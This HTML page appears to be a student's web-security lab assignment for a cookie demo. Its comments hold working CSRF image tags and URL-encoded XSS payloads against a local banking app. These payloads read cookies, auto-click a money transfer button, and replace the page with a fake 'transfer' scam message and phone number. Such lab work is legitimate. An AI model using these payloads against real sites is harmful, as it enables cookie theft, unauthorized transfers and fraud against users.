<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Cookies</title>
</head>

<body>
    <h1>Cookies</h1>
    <p>Q1B1 Cookie: {{ q1b1_cookie }}</p>
    <!-- <p>Q1B2 Cookie: {{ q1b2_cookie }}</p> -->
    <p>Q1B2 Cookie: This cookie is sent only for requests to folder Q1B2 of the website</p>
    <p>Q1B3 Cookie: {{ q1b3_cookie }}</p>
    <a href="/set_cookies">Set Cookies</a>
    <br>
    <a href="/Q1B2">Display Q1B2 Cookie</a>
    <br>
    <br>
    <!-- Q2 image CSRF image tag: -->
    <!-- <img src="http://localhost:8080/loggedIn?username=AWilbert96&moneyAmount=1" /> -->
    <!-- <img src="http://127.0.0.1:2222/loggedIn?username=AWilbert96&moneyAmount=1" /> -->
    <!-- Q3 -->
    <!-- <iframe src="http://localhost:8080/loggedIn?username=tz&moneyAmount=%3Cscript%3Ealert(document.cookie.split(%27;%20%27).find(row%20=%3E%20row.startsWith(%27Q3Cookie=%27)).split(%27=%27)[1]);%20%20%20%20%20document.getElementById(%27transfer%27).click();%20%3C/script%3E" width="100%" height="100%"></iframe> -->
    <!-- <iframe src="http://127.0.0.1:2222/loggedIn?username=tz&moneyAmount=%3Cscript%3Ealert(document.cookie.split(%27;%20%27).find(row%20=%3E%20row.startsWith(%27Q3Cookie=%27)).split(%27=%27)[1]);%20%20%20%20%20document.getElementById(%27transfer%27).click();%20%3C/script%3E" width="100%" height="100%"></iframe> -->
    <!-- Q4 -->
    <!-- <iframe src="http://localhost:8080/Q4?username=&moneyAmount=182%3Cscript%3Ealert(document.cookie.split(%27;%20%27).find(row%20=%3E%20row.startsWith(%27magicCookie=%27)).split(%27=%27)[1]);%20%20%20%20%20document.getElementById(%27transfer%27).click();%20%3C/script%3E" width="800" height="500"></iframe> -->
    <!-- <iframe src="http://127.0.0.1:2222/Q4?username=&moneyAmount=182%3Cscript%3Ealert(document.cookie.split(%27;%20%27).find(row%20=%3E%20row.startsWith(%27magicCookie=%27)).split(%27=%27)[1]);%20%20%20%20%20document.getElementById(%27transfer%27).click();%20%3C/script%3E" width="800" height="500"></iframe> -->

    <!-- Q5 -->
    <!-- <iframe src="http://localhost:8080/loggedIn?username=tz&moneyAmount=%3Cscript%3Edocument.body.innerHTML=%22%3Cp%3E666666 was transferred from your account! Call the helpline 666-390-6590 to resolve.%3C/p%3E%20%3Cimg src=%27/cat.jpeg%27 height=%27100%%27 width=%27100%%27/%3E%22;%3C/script%3E" width="800" height="500"></iframe> -->
    <!-- <iframe src="http://127.0.0.1:2222/loggedIn?username=tz&moneyAmount=%3Cscript%3Edocument.body.innerHTML=%22%3Cp%3E666666 was transferred from your account! Call the helpline 666-390-6590 to resolve.%3C/p%3E%20%3Cimg src=%27/cat.jpeg%27 height=%27100%%27 width=%27100%%27/%3E%22;%3C/script%3E" width="800" height="500"></iframe> -->
</body>

</html>

<!-- <script>alert("Site is vulnerable to XSS!")</script>; -->

<!-- <script>
    alert(document.cookie.split('; ').find(row => row.startsWith('Q3Cookie=')).split('=')[1]);
    document.getElementById('transfer').click();
</script>

<script>alert(document.cookie.split('; ').find(row => row.startsWith('Q3Cookie=')).split('=')[1]);     document.getElementById('transfer').click(); </script>

<input id="moneyAmount" name="moneyAmount" size="32" type="text" value="">

http://localhost:8080/loggedIn?username=tz&moneyAmount=%3Cscript%3Ealert(document.cookie.split(%27;%20%27).find(row%20=%3E%20row.startsWith(%27Q3Cookie=%27)).split(%27=%27)[1]);%20%20%20%20%20document.getElementById(%27transfer%27).click();%20%3C/script%3E 

http://localhost:8080/loggedIn?username=tz&moneyAmount=<script>alert(document.cookie.split('; ').find(row => row.startsWith('Q3Cookie=')).split('=')[1]);     document.getElementById('transfer').click(); </script>
-->


